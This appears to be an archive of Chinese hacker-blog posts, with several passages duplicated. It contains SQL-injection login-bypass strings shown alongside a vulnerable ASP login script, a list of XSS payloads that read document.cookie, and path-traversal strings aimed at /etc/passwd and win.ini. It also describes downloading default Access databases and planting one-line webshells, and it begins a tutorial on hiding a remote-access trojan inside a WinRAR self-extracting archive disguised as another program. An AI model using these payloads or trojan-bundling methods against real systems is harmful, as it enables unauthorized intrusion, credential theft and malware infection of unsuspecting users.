有关黑客技术、网络安全攻防等。
1月18
咱们提起这个万能密码,我相信玩过黑的都非常熟悉吧,也就是'or' = 'or'属于很老的漏洞,这只最基础的一种,最近我看见很多网站有这种bug,最近有个辽宁沈阳的小伙在google搜索关键词“332003231 后台”貌似想黑哥我一把。下面我来总结一下吧:
1:语句:''or'='or' a'or'1=1-- 'or1=1-- "or1=1-- or1=1-- 'or"="a'='a ') or ('a'='a等等。。。
<%
(1)pwd = request.form("pwd") "获取客户端输入的密码,再把值赋给pwd"
(2)name = request.form("name") "获取客户端输入的用户名再把值赋给name"
都没有进行任何过滤
(3)Set rs = Server.CreateObject("ADODB.Connection") "利用Server对象的CreateObject方法创建ADO组件的Connection对象"
(4)sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'" "将用户名和密码放入查询语句中查询数据库"
(5)Set rs = conn.Execute(sql) "执行SQL语句"
(6)If Not rs.EOF = True Then "当前的记录位于Connection对象的最记录之后一个前"
(7)Session("Name") = rs("UserName") "将UserName的属性赋给Name的Session自定义变量"
(8)Session("pwd") = rs("PassWord") "将PassWord的属性赋给pwd的Session自定义变量"
(9)Response.Redirect("Manage.asp")了 "利用Response对象的Redirect方法重定向"Manage.asp"
(10)Else
(11)Response.Redirect "chklogin.asp?msg=您输入了错误的帐号或口令,请再次输入!"
(12)End If
(13)end if
%>
1:语句:''or'='or' a'or'1=1-- 'or1=1-- "or1=1-- or1=1-- 'or"="a'='a ') or ('a'='a等等。。。
<%
(1)pwd = request.form("pwd") "获取客户端输入的密码,再把值赋给pwd"
(2)name = request.form("name") "获取客户端输入的用户名再把值赋给name"
都没有进行任何过滤
(3)Set rs = Server.CreateObject("ADODB.Connection") "利用Server对象的CreateObject方法创建ADO组件的Connection对象"
(4)sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'" "将用户名和密码放入查询语句中查询数据库"
(5)Set rs = conn.Execute(sql) "执行SQL语句"
(6)If Not rs.EOF = True Then "当前的记录位于Connection对象的最记录之后一个前"
(7)Session("Name") = rs("UserName") "将UserName的属性赋给Name的Session自定义变量"
(8)Session("pwd") = rs("PassWord") "将PassWord的属性赋给pwd的Session自定义变量"
(9)Response.Redirect("Manage.asp")了 "利用Response对象的Redirect方法重定向"Manage.asp"
(10)Else
(11)Response.Redirect "chklogin.asp?msg=您输入了错误的帐号或口令,请再次输入!"
(12)End If
(13)end if
%>
10月25
很多网站存在xss 跨站脚本漏洞,下面的安全测试测用例还是挺管用的,能够查找和发现潜在的bug,大家可以试试看吧。
<script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
<script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
9月26
以前有写过一篇关于access安全的文章,但总觉得有不足,经过测试研究后,重新写出来,欢迎大家进行讨论。 
首先我们知道常见的傻瓜式入侵ASP网站下载默认数据库是其中一个方法,挖掘机挖掘大量的网站,寻找网站中存在的默认数据库。数据库作为一个动态网站最重要的核心,里面记录了大量信息。作为一名入侵者,拿到数据库就等于拿到网站的权限了,轻则泄露数据,重则影响网站乃至整个服务器的安全。
ASP ACCESS的网站结构是网上最流行的架构方式之一,几乎的站长使用的都是别人的网站系统,很多人都忽略了修改默认数据库,从而导致入侵者有入侵的机会。
在入侵ASP ACCESS网站系统中,直接下载数据库、使用一句话木马是最常见的方法,其中直接下载数据库包括了通过暴库和直接下载默认数据库来得到数据库路径,插入一句话木马是针对得到数据库地址,并且是ASP或者ASA为扩展名的数据库。
所以网上流传的修改数据库扩展名为ASP和ASA不是一个最安全的方法,反而被入侵者知道路径后,是一个致命的错。而将数据库名加上#也并非安全的做法。

首先我们知道常见的傻瓜式入侵ASP网站下载默认数据库是其中一个方法,挖掘机挖掘大量的网站,寻找网站中存在的默认数据库。数据库作为一个动态网站最重要的核心,里面记录了大量信息。作为一名入侵者,拿到数据库就等于拿到网站的权限了,轻则泄露数据,重则影响网站乃至整个服务器的安全。
ASP ACCESS的网站结构是网上最流行的架构方式之一,几乎的站长使用的都是别人的网站系统,很多人都忽略了修改默认数据库,从而导致入侵者有入侵的机会。
在入侵ASP ACCESS网站系统中,直接下载数据库、使用一句话木马是最常见的方法,其中直接下载数据库包括了通过暴库和直接下载默认数据库来得到数据库路径,插入一句话木马是针对得到数据库地址,并且是ASP或者ASA为扩展名的数据库。
所以网上流传的修改数据库扩展名为ASP和ASA不是一个最安全的方法,反而被入侵者知道路径后,是一个致命的错。而将数据库名加上#也并非安全的做法。
9月1
5月16
大家好,我叫汏,壊豬~,也叫汏,壊蛋~.当然啦有很多朋友也叫我猪头。嘿嘿
可能是太猪了吧。呵呵,谁叫俺是猪头呢。
今天我来给大家讲下rar压缩文件的高级捆绑技术也就是说
我们要利用winrar创建自解压文件然后在里面捆绑我们的木马。
这个鸽子配制就不用我再说了吧。还不会鸽子配制的朋友请去看下相关的教程,本教程只说rar高级捆绑技术
好了,木马生好了。开始捆绑,我要捆绑这个流量精灵。
首先第一种方法是用VBS脚本来弄,看我演示
可能是太猪了吧。呵呵,谁叫俺是猪头呢。

今天我来给大家讲下rar压缩文件的高级捆绑技术也就是说
我们要利用winrar创建自解压文件然后在里面捆绑我们的木马。
这个鸽子配制就不用我再说了吧。还不会鸽子配制的朋友请去看下相关的教程,本教程只说rar高级捆绑技术
好了,木马生好了。开始捆绑,我要捆绑这个流量精灵。
首先第一种方法是用VBS脚本来弄,看我演示